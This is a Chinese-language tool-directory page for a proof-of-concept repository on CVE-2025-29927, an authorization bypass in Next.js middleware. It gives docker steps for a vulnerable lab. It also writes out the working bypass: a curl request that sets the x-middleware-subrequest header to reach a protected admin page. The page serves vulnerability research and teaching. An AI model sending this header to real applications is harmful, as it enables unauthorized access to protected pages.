Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
nextjs-middleware-exploit — 针对 Next.js 中间件漏洞(CVE-2025-29927)的研究,该漏洞允许授权绕过并存在潜在利用风险。 | Kitploit
工具/GitHubGitHub/l1uk/nextjs-middleware-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证学习与教育
GitHubl1uk/nextjs-middleware-exploit

nextjs-middleware-exploit

针对 Next.js 中间件漏洞(CVE-2025-29927)的研究,该漏洞允许授权绕过并存在潜在利用风险。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Next.js 中间件漏洞研究 (CVE-2025-29927)

此仓库演示了 Next.js 中间件中的一个严重 漏洞(CVE-2025-29927),影响版本为 11.1.4 至 15.1.7。该漏洞允许通过缓存投毒实现 授权绕过、CSP 绕过 以及潜在的 DoS 攻击。问题源于 x-middleware-subrequest 请求头的处理方式,使得攻击者能够绕过中间件保护机制。

此概念验证专门针对 v12 中的漏洞。

使用方法

环境搭建

使用 docker 和本仓库中的文件来搭建易受攻击的环境,运行以下命令:

root@kitploit:~
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app

漏洞利用

本仓库已包含 exploit.sh 脚本,用于测试该漏洞的利用。要测试它,请运行:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

此外,您还可以通过以下方式测试该漏洞的利用:

  1. 在未认证的情况下请求 admin 页面。您应该会被重定向到 login 页面。
root@kitploit:~
curl -i http://localhost:3000/admin
  1. 在未认证的情况下请求该页面,但使用 x-middleware-subrequest 请求头。您应该能够绕过认证页面。
root@kitploit:~
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin

安全公告

  • CVE-2025-29927:安全公告链接
下载工具